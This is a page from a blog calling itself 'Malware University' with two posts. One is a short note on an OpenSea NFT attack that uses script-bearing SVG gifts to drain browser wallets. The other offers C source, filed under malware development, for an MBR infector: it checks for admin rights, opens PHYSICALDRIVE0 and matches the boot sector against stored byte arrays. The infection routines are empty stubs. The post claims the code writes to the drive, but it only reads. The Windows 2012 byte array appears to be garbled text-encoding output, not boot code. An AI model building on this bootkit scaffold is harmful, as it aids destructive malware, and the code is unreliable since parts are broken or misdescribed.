Skip to content

Malware University

Class is in Session

  • About
    • Privacy Policy
  • Contact
  • Resources

Category: Techniques

OpenSea NFT Bug

Posted on October 14, 2021 - October 14, 2021 by admin

Users are being sent “gifts” with executable photos. Within a browser context. Siphoning off peoples’ JS-powered wallet by communicating within the browser. Requires some social engineering to get an extra click, confirming the siphoning.

Watch your wallets.

Posted in Current Events, TechniquesTagged cyrpto, javascript, opensea, phishing, svg, xml, xss

Read (and infect) Windows MBR

Posted on September 14, 2021 - September 14, 2021 by admin

This code is useful for detecting the exact version of Windows you are using, and then choosing to infect (writing to PHYSICALDRIVE0) of the target machine. Windows 2012 Server and XP are supported in this snippet.

#include "stdafx.h"

#define BUFFER_SIZE		1000
#define SZ_WXP_MBR		382
#define SZ_W2K12_MBR	870 

// You can't include things like partition table, because they are probably unique to each machine.
unsigned char WXP_MBR[382] = {
    0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C, 0xFB,
    0x50, 0x07, 0x50, 0x1F, 0xFC, 0xBE, 0x1B, 0x7C,
    0xBF, 0x1B, 0x06, 0x50, 0x57, 0xB9, 0xE5, 0x01,
    0xF3, 0xA4, 0xCB, 0xBD, 0xBE, 0x07, 0xB1, 0x04,
    0x38, 0x6E, 0x00, 0x7C, 0x09, 0x75, 0x13, 0x83,
    0xC5, 0x10, 0xE2, 0xF4, 0xCD, 0x18, 0x8B, 0xF5,
    0x83, 0xC6, 0x10, 0x49, 0x74, 0x19, 0x38, 0x2C,
    0x74, 0xF6, 0xA0, 0xB5, 0x07, 0xB4, 0x07, 0x8B,
    0xF0, 0xAC, 0x3C, 0x00, 0x74, 0xFC, 0xBB, 0x07,
    0x00, 0xB4, 0x0E, 0xCD, 0x10, 0xEB, 0xF2, 0x88,
    0x4E, 0x10, 0xE8, 0x46, 0x00, 0x73, 0x2A, 0xFE,
    0x46, 0x10, 0x80, 0x7E, 0x04, 0x0B, 0x74, 0x0B,
    0x80, 0x7E, 0x04, 0x0C, 0x74, 0x05, 0xA0, 0xB6,
    0x07, 0x75, 0xD2, 0x80, 0x46, 0x02, 0x06, 0x83,
    0x46, 0x08, 0x06, 0x83, 0x56, 0x0D, 0x0A, 0x00,
    0xE8, 0x21, 0x00, 0x73, 0x05, 0xA0, 0xB6, 0x07,
    0xEB, 0xBC, 0x81, 0x3E, 0xFE, 0x7D, 0x55, 0xAA,
    0x74, 0x0B, 0x80, 0x7E, 0x10, 0x00, 0x74, 0xC8,
    0xA0, 0xB7, 0x07, 0xEB, 0xA9, 0x8B, 0xFC, 0x1E,
    0x57, 0x8B, 0xF5, 0xCB, 0xBF, 0x05, 0x00, 0x8A,
    0x56, 0x00, 0xB4, 0x08, 0xCD, 0x13, 0x72, 0x23,
    0x8A, 0xC1, 0x24, 0x3F, 0x98, 0x8A, 0xDE, 0x8A,
    0xFC, 0x43, 0xF7, 0xE3, 0x8B, 0xD1, 0x86, 0xD6,
    0xB1, 0x06, 0xD2, 0xEE, 0x42, 0xF7, 0xE2, 0x39,
    0x56, 0x0D, 0x0A, 0x77, 0x23, 0x72, 0x05, 0x39,
    0x46, 0x08, 0x73, 0x1C, 0xB8, 0x01, 0x02, 0xBB,
    0x00, 0x7C, 0x8B, 0x4E, 0x02, 0x8B, 0x56, 0x00,
    0xCD, 0x13, 0x73, 0x51, 0x4F, 0x74, 0x4E, 0x32,
    0xE4, 0x8A, 0x56, 0x00, 0xCD, 0x13, 0xEB, 0xE4,
    0x8A, 0x56, 0x00, 0x60, 0xBB, 0xAA, 0x55, 0xB4,
    0x41, 0xCD, 0x13, 0x72, 0x36, 0x81, 0xFB, 0x55,
    0xAA, 0x75, 0x30, 0xF6, 0xC1, 0x01, 0x74, 0x2B,
    0x61, 0x60, 0x6A, 0x00, 0x6A, 0x00, 0xFF, 0x76,
    0x0D, 0x0A, 0xFF, 0x76, 0x08, 0x6A, 0x00, 0x68,
    0x00, 0x7C, 0x6A, 0x01, 0x6A, 0x10, 0xB4, 0x42,
    0x8B, 0xF4, 0xCD, 0x13, 0x61, 0x61, 0x73, 0x0E,
    0x4F, 0x74, 0x0B, 0x32, 0xE4, 0x8A, 0x56, 0x00,
    0xCD, 0x13, 0xEB, 0xD6, 0x61, 0xF9, 0xC3, 0x49,
    0x6E, 0x76, 0x61, 0x6C, 0x69, 0x64, 0x20, 0x70,
    0x61, 0x72, 0x74, 0x69, 0x74, 0x69, 0x6F, 0x6E,
    0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x00, 0x45,
    0x72, 0x72, 0x6F, 0x72, 0x20, 0x6C, 0x6F, 0x61,
    0x64, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x70, 0x65,
    0x72, 0x61, 0x74, 0x69, 0x6E, 0x67, 0x20, 0x73,
    0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0x4D, 0x69,
    0x73, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x70,
    0x65, 0x72, 0x61, 0x74, 0x69, 0x6E, 0x67, 0x20,
    0x73, 0x79, 0x73, 0x74, 0x65, 0x6D 
};

unsigned char W2K12_MBR[870] = {
    0xFF, 0xFE, 0x33, 0x00, 0x14, 0x25, 0xC4, 0x00,
    0x68, 0x25, 0x5D, 0x25, 0x00, 0x00, 0x7C, 0x00,
    0xC4, 0x00, 0x14, 0x25, 0xC4, 0x00, 0x6A, 0x25,
    0x5B, 0x25, 0x00, 0x00, 0x7C, 0x00, 0x10, 0x25,
    0x00, 0x00, 0x06, 0x00, 0x63, 0x25, 0x00, 0x00,
    0x02, 0x00, 0x7F, 0x20, 0x64, 0x22, 0xF1, 0x00,
    0x50, 0x00, 0x68, 0x00, 0x1C, 0x00, 0x06, 0x00,
    0x66, 0x25, 0x1A, 0x22, 0x63, 0x25, 0x04, 0x00,
    0x00, 0x00, 0x5C, 0x25, 0x5B, 0x25, 0x07, 0x00,
    0xC7, 0x00, 0x7E, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x7C, 0x00, 0x0B, 0x00, 0x0F, 0x00, 0xE0, 0x00,
    0x0E, 0x00, 0x01, 0x00, 0xE2, 0x00, 0x3C, 0x25,
    0x10, 0x00, 0x93, 0x03, 0xB1, 0x00, 0x50, 0x25,
    0x18, 0x00, 0xEA, 0x00, 0x56, 0x00, 0x00, 0x00,
    0x55, 0x00, 0x5E, 0x25, 0x46, 0x00, 0x11, 0x00,
    0x05, 0x00, 0x5E, 0x25, 0x46, 0x00, 0x10, 0x00,
    0x00, 0x00, 0x24, 0x25, 0x41, 0x00, 0x57, 0x25,
    0xAC, 0x00, 0x55, 0x00, 0x50, 0x25, 0x13, 0x00,
    0x5D, 0x00, 0x72, 0x00, 0x0F, 0x00, 0xFC, 0x00,
    0x1A, 0x22, 0x55, 0x00, 0xAC, 0x00, 0x75, 0x00,
    0x09, 0x00, 0x48, 0x22, 0x34, 0x25, 0x01, 0x00,
    0x00, 0x00, 0x74, 0x00, 0x03, 0x00, 0xA0, 0x25,
    0x46, 0x00, 0x10, 0x00, 0x66, 0x00, 0x60, 0x00,
    0xC7, 0x00, 0x7E, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x74, 0x00, 0x26, 0x00, 0x66, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x66, 0x00, 0xA0, 0x00, 0x76, 0x00, 0x08, 0x00,
    0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x7C, 0x00, 0x68, 0x00, 0x01, 0x00,
    0x00, 0x00, 0x68, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x24, 0x25, 0x42, 0x00, 0xE8, 0x00, 0x56, 0x00,
    0x00, 0x00, 0xEF, 0x00, 0x20, 0x23, 0x50, 0x25,
    0x13, 0x00, 0x92, 0x01, 0xE2, 0x00, 0x00, 0x25,
    0x10, 0x00, 0xA7, 0x20, 0xB4, 0x03, 0x14, 0x00,
    0x55, 0x25, 0x01, 0x00, 0x02, 0x00, 0x57, 0x25,
    0x00, 0x00, 0x7C, 0x00, 0xE8, 0x00, 0x56, 0x00,
    0x00, 0x00, 0xE8, 0x00, 0x76, 0x00, 0x01, 0x00,
    0xE8, 0x00, 0x4E, 0x00, 0x02, 0x00, 0xE8, 0x00,
    0x6E, 0x00, 0x03, 0x00, 0x50, 0x25, 0x13, 0x00,
    0x66, 0x00, 0x61, 0x00, 0x73, 0x00, 0x1C, 0x00,
    0xA0, 0x25, 0x4E, 0x00, 0x11, 0x00, 0x75, 0x00,
    0x0C, 0x00, 0xC7, 0x00, 0x7E, 0x00, 0x00, 0x00,
    0xC7, 0x00, 0x0F, 0x00, 0xE4, 0x00, 0xE8, 0x00,
    0x00, 0x00, 0x93, 0x25, 0xC7, 0x00, 0xB4, 0x03,
    0xE4, 0x00, 0x55, 0x00, 0x32, 0x00, 0xA3, 0x03,
    0xE8, 0x00, 0x56, 0x00, 0x00, 0x00, 0x50, 0x25,
    0x13, 0x00, 0x5D, 0x00, 0xB4, 0x03, 0xA7, 0x20,
    0xFC, 0x00, 0x3E, 0x00, 0xA0, 0x25, 0x7D, 0x00,
    0x55, 0x00, 0xAC, 0x00, 0x75, 0x00, 0x6E, 0x00,
    0xA0, 0x00, 0x76, 0x00, 0x00, 0x00, 0xA6, 0x03,
    0xEC, 0x00, 0x00, 0x00, 0x75, 0x00, 0x17, 0x00,
    0xB7, 0x00, 0x91, 0x25, 0x64, 0x25, 0xB5, 0x00,
    0x64, 0x00, 0xA6, 0x03, 0xE2, 0x00, 0x00, 0x00,
    0x91, 0x25, 0x80, 0x25, 0xB5, 0x00, 0x60, 0x00,
    0xA6, 0x03, 0x7C, 0x00, 0x00, 0x00, 0x91, 0x25,
    0xA0, 0x00, 0xB5, 0x00, 0x64, 0x00, 0xA6, 0x03,
    0x75, 0x00, 0x00, 0x00, 0x1A, 0x22, 0x55, 0x25,
    0x00, 0x00, 0x57, 0x25, 0x50, 0x25, 0x1A, 0x00,
    0x66, 0x00, 0x23, 0x00, 0x14, 0x25, 0x75, 0x00,
    0x3B, 0x00, 0x66, 0x00, 0xFC, 0x00, 0x1A, 0x22,
    0x54, 0x00, 0x43, 0x00, 0x50, 0x00, 0x41, 0x00,
    0x75, 0x00, 0x32, 0x00, 0xFC, 0x00, 0x19, 0x22,
    0x02, 0x00, 0x01, 0x00, 0x72, 0x00, 0x2C, 0x00,
    0x66, 0x00, 0x68, 0x00, 0x07, 0x00, 0x57, 0x25,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x66, 0x00, 0x68, 0x00, 0x08, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x53, 0x00,
    0x66, 0x00, 0x53, 0x00, 0x66, 0x00, 0x55, 0x00,
    0x66, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x66, 0x00, 0x61, 0x00, 0x68, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x07, 0x00, 0x50, 0x25, 0x1A, 0x00,
    0x5A, 0x00, 0x32, 0x00, 0xF7, 0x00, 0xA9, 0x03,
    0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x50, 0x25, 0x18, 0x00, 0xE1, 0x00, 0x56, 0x25,
    0x07, 0x00, 0xB4, 0x03, 0x08, 0x00, 0xE1, 0x00,
    0x62, 0x25, 0x07, 0x00, 0xB4, 0x03, 0x03, 0x00,
    0xE1, 0x00, 0x61, 0x25, 0x07, 0x00, 0x32, 0x00,
    0xA3, 0x03, 0x05, 0x00, 0x00, 0x00, 0x07, 0x00,
    0xEF, 0x00, 0x61, 0x22, 0xBC, 0x00, 0x3C, 0x00,
    0x00, 0x00, 0x74, 0x00, 0x09, 0x00, 0x57, 0x25,
    0x07, 0x00, 0x00, 0x00, 0x24, 0x25, 0x0E, 0x00,
    0x50, 0x25, 0x10, 0x00, 0xB4, 0x03, 0x65, 0x22,
    0x20, 0x23, 0xB4, 0x03, 0xB2, 0x00, 0x2B, 0x00,
    0x54, 0x25, 0xA3, 0x03, 0x64, 0x00, 0xB4, 0x03,
    0x00, 0x00, 0x24, 0x00, 0x02, 0x00, 0xB1, 0x03,
    0xB0, 0x00, 0x24, 0x00, 0x02, 0x00, 0x1C, 0x25,
    0x49, 0x00, 0x6E, 0x00, 0x76, 0x00, 0x61, 0x00,
    0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00,
    0x70, 0x00, 0x61, 0x00, 0x72, 0x00, 0x74, 0x00,
    0x69, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00,
    0x6E, 0x00, 0x20, 0x00, 0x74, 0x00, 0x61, 0x00,
    0x62, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x00, 0x00,
    0x45, 0x00, 0x72, 0x00, 0x72, 0x00, 0x6F, 0x00,
    0x72, 0x00, 0x20, 0x00, 0x6C, 0x00, 0x6F, 0x00,
    0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x6E, 0x00,
    0x67, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x70, 0x00,
    0x65, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00,
    0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00,
    0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00,
    0x65, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x4D, 0x00,
    0x69, 0x00, 0x73, 0x00, 0x73, 0x00, 0x69, 0x00,
    0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x6F, 0x00,
    0x70, 0x00, 0x65, 0x00, 0x72, 0x00, 0x61, 0x00,
    0x74, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00,
    0x20, 0x00, 0x73, 0x00, 0x79, 0x00, 0x73, 0x00,
    0x74, 0x00, 0x65, 0x00, 0x6D, 0x00 
};




BOOL IsUserAdmin()
{
	BOOL b;
	SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
	PSID administratorsGroup;

	b = AllocateAndInitializeSid(&ntAuthority,
		2,
		SECURITY_BUILTIN_DOMAIN_RID,
		DOMAIN_ALIAS_RID_ADMINS,
		0, 0, 0, 0, 0, 0,
		&administratorsGroup);
	if (b)
	{
		if (!CheckTokenMembership(NULL, administratorsGroup, &b))
			b = FALSE;
		FreeSid(administratorsGroup);
	}

	return b;
}

// We look for exact matches at the moment.

BOOL IsWindowsXP(char* mbr)
{
	for (int i = 0; i < SZ_WXP_MBR; i++)
		if (*(mbr + i) != *(WXP_MBR + i))
			return false;
	return true;
}

BOOL IsWindows2012(char* mbr)
{
	for (int i = 0; i < SZ_W2K12_MBR; i++)
		if (*(mbr + i) != *(W2K12_MBR + i))
			return false;
	return true;
}

void InfectMBR_XP()
{

}

void InfectMBR_2012()
{

}



int _tmain(int argc, _TCHAR* argv[])
{
	FILE*		dosDevice;
	FILE*		outputFile;
	char		buffer[BUFFER_SIZE];

	if (!IsUserAdmin())
	{
		fprintf(stderr, "You must be admin\n");

		return -1;
	}

	dosDevice = fopen("\\\\.\\PHYSICALDRIVE0", "rb");
	if (!dosDevice)
	{
		fprintf(stderr, "Unable to open MBR\n");

		return -2;
	}

	outputFile = fopen("output.img", "wb");
	if (!outputFile)
	{
		fprintf(stderr, "Unable to open output file\n");

		return -1;
	}

	fread(buffer, BUFFER_SIZE, sizeof(char), dosDevice);
	fclose(dosDevice);

	if (IsWindowsXP(buffer))
		fprintf(stdout, "Detected Windows XP MBR\n");
	else if (IsWindows2012(buffer))
		fprintf(stdout, "Detected Windows 2012 Server MBR\n");

	return 0;
}
Posted in Code Analysis, Malware Development, TechniquesTagged infector, mbr, windowsLeave a comment

Recent Posts

  • Manual Scraping
  • Nitter Replacement
  • MFA Abuse in Splunk
  • Virtualbox Automation
  • Repository Poisoning

Recent Comments

    Archives

    • August 2024
    • July 2023
    • August 2022
    • March 2022
    • November 2021
    • October 2021
    • September 2021
    • August 2021
    • July 2021
    • June 2021
    • February 2021
    • December 2020
    • October 2020
    • September 2020
    • April 2020
    • March 2020
    • January 2020
    • July 2019
    • June 2019

    Categories

    • Campaign Analysis
    • Campaign Management
    • Code Analysis
    • Current Events
    • Malware Development
    • Techniques
    • Uncategorized
    • Utilities

    Meta

    • Register
    • Log in
    • Entries feed
    • Comments feed
    • WordPress.org
    Proudly powered by WordPress | Theme: micro, developed by DevriX.